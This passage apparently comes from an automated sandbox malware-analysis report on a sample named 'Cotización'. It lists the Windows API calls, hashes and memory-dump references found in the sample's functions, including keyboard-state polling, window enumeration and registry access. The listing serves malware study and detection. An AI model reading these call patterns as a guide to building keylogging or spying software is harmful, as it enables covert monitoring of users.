                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                • String ID:
                • API String ID: 2170234536-0
                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                APIs
                • GetKeyboardState.USER32(?), ref: 00453CE0
                • SetKeyboardState.USER32(?), ref: 00453D3B
                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                • GetKeyState.USER32(000000A0), ref: 00453D75
                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                • GetKeyState.USER32(000000A1), ref: 00453DB5
                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                • GetKeyState.USER32(00000011), ref: 00453DEF
                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                • GetKeyState.USER32(00000012), ref: 00453E26
                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                • GetKeyState.USER32(0000005B), ref: 00453E5D
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                APIs
                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                • String ID:
                • API String ID: 3096461208-0
                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                APIs
                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                • DeleteObject.GDI32(?), ref: 0047151E
                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                • DeleteObject.GDI32(?), ref: 004715EA
                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                • String ID:
                • API String ID: 3218148540-0
                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                • String ID:
                • API String ID: 136442275-0
                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                APIs
                • _wcsncpy.LIBCMT ref: 00467490
                • _wcsncpy.LIBCMT ref: 004674BC
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • _wcstok.LIBCMT ref: 004674FF
                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                • _wcstok.LIBCMT ref: 004675B2
                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                • _wcslen.LIBCMT ref: 00467793
                • _wcscpy.LIBCMT ref: 00467641
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • _wcslen.LIBCMT ref: 004677BD
                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                • String ID: X
                • API String ID: 3104067586-3081909835
                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                APIs
                • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                • _wcslen.LIBCMT ref: 004610A3
                • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                • GetWindowRect.USER32(?,?), ref: 00461248
                  • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                • String ID: ThumbnailClass
                • API String ID: 4136854206-1241985126
                • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                APIs
                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                • GetClientRect.USER32(?,?), ref: 00471A1A
                • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                • DestroyIcon.USER32(?), ref: 00471AF4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                • String ID: 2
                • API String ID: 1331449709-450215437
                • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                • __swprintf.LIBCMT ref: 00460915
                • __swprintf.LIBCMT ref: 0046092D
                • _wprintf.LIBCMT ref: 004609E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                • API String ID: 3054410614-2561132961
                • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                • CLSIDFromString.OLE32(?,?), ref: 004587B3
                • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                • RegCloseKey.ADVAPI32(?), ref: 004587C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                • API String ID: 600699880-22481851
                • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: DestroyWindow
                • String ID: static
                • API String ID: 3375834691-2160076837
                • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$DriveType
                • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                • API String ID: 2907320926-3566645568
                • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                APIs
                  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                • DeleteObject.GDI32(006F0000), ref: 00470A04
                • DestroyIcon.USER32(003D0074), ref: 00470A1C
                • DeleteObject.GDI32(7E861006), ref: 00470A34
                • DestroyWindow.USER32(003A0043), ref: 00470A4C
                • DestroyIcon.USER32(?), ref: 00470A73
                • DestroyIcon.USER32(?), ref: 00470A81
                • KillTimer.USER32(00000000,00000000), ref: 00470B00
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                • String ID:
                • API String ID: 1237572874-0
                • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                APIs
                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                • VariantInit.OLEAUT32(?), ref: 004793E1
                • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                • VariantCopy.OLEAUT32(?,?), ref: 00479461
                • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                • VariantClear.OLEAUT32(?), ref: 00479489
                • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                • VariantClear.OLEAUT32(?), ref: 004794CA
                • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                • String ID:
                • API String ID: 2706829360-0
                • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
